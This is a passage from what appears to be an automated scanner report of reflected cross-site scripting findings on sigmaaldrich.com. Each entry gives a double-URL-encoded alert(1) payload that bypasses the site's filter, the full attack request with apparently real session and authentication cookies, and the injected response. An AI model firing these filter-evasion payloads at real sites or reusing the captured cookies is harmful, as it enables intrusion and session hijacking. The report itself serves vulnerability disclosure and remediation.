Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:59 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcaab7d";alert(1)//1ec0894cb1e/medialib/labware/labware-icons/pipettes","E404") ;
   </script>
...[SNIP]...

1.389. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/pipettes [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/pipettes

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73e0b%2522%253balert%25281%2529%252f%252ff2db94c8e27 was submitted in the REST URL parameter 2. This input was echoed as 73e0b";alert(1)//f2db94c8e27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib73e0b%2522%253balert%25281%2529%252f%252ff2db94c8e27/labware/labware-icons/pipettes HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib73e0b";alert(1)//f2db94c8e27/labware/labware-icons/pipettes","E404") ;
   </script>
...[SNIP]...

1.390. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/pipettes [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/pipettes

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec61f%2522%253balert%25281%2529%252f%252f7ddab408077 was submitted in the REST URL parameter 3. This input was echoed as ec61f";alert(1)//7ddab408077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwareec61f%2522%253balert%25281%2529%252f%252f7ddab408077/labware-icons/pipettes HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwareec61f";alert(1)//7ddab408077/labware-icons/pipettes","E404") ;
   </script>
...[SNIP]...

1.391. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/pipettes [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/pipettes

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 500b8%2522%253balert%25281%2529%252f%252f9243a1f255a was submitted in the REST URL parameter 4. This input was echoed as 500b8";alert(1)//9243a1f255a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons500b8%2522%253balert%25281%2529%252f%252f9243a1f255a/pipettes HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons500b8";alert(1)//9243a1f255a/pipettes","E404") ;
   </script>
...[SNIP]...

1.392. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/pipettes [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/pipettes

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5bf3%2522%253balert%25281%2529%252f%252f29db45669a4 was submitted in the REST URL parameter 5. This input was echoed as c5bf3";alert(1)//29db45669a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/pipettesc5bf3%2522%253balert%25281%2529%252f%252f29db45669a4 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/pipettesc5bf3";alert(1)//29db45669a4","E404") ;
   </script>
...[SNIP]...

1.393. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/spectroscopy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/spectroscopy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5755%2522%253balert%25281%2529%252f%252fabe43477296 was submitted in the REST URL parameter 1. This input was echoed as c5755";alert(1)//abe43477296 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcc5755%2522%253balert%25281%2529%252f%252fabe43477296/medialib/labware/labware-icons/spectroscopy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
